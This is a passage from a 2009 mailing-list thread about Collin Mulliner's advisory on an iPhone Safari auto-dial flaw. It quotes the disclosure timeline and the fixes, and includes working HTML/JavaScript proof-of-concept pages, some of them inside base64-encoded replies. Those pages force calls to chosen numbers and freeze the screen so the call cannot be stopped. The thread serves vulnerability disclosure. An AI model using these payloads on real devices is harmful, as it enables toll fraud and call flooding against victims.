>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
